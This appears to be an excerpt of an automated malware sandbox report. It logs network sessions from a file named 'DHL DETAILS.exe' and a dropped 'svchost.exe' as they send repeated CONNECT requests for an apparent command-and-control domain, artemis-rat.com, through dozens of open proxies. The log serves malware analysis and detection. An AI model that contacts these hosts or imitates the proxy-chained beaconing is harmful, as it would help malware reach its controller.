
Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49879	154.205.152.96	9080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.243187904 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.452620029 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49872	185.158.114.14	25697	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.249694109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49926	172.67.255.224	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.267153978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.421468973 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49910	104.37.135.145	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.282445908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49956	104.19.83.128	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.317121983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.471818924 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49930	91.134.140.160	48962	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.318607092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49900	72.195.114.169	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.327997923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49888	27.96.235.171	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.339598894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49875	110.12.211.140	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.341336966 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49921	174.77.111.196	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.362997055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50122	43.153.175.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.363274097 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	50125	43.153.175.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.370575905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49735	94.131.63.120	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.372073889 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	50129	43.153.175.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.374659061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	50133	43.153.175.43	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.378442049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49933	184.178.172.5	15303	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.389579058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	50035	172.67.181.32	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.413438082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.567965984 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	50023	34.49.208.221	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.417814016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49913	45.138.87.238	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.433795929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	50058	104.19.85.214	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.439496040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.593945980 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49954	18.134.236.231	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.448456049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.612380028 CET	65	IN	HTTP/1.1 200 Connection Established Content-Type: text/plain

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49957	95.164.89.123	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.464622974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49979	198.105.111.15	6693	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.472520113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.003088951 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49996	35.79.120.242	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.475512981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.746531010 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:12 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49965	195.90.216.75	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.476547956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49980	46.17.63.166	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.478713036 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.773138046 CET	339	IN	HTTP/1.1 403 Forbidden Server: squid/4.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html;charset=utf-8 Content-Length: 5 X-Squid-Error: TCP_RESET 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from proxy.wakoopa.com Via: 1.1 proxy.wakoopa.com (squid/4.7) Connection: keep-alive Data Raw: 72 65 73 65 74 Data Ascii: reset

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49942	38.54.16.97	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.480993032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.826031923 CET	176	IN	HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49939	111.90.150.109	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.488037109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50040	162.223.94.166	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.497677088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.811845064 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50096	43.153.22.29	10005	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.514276981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.690388918 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:12.690419912 CET	160	IN	HTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	50126	104.21.194.19	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.539804935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
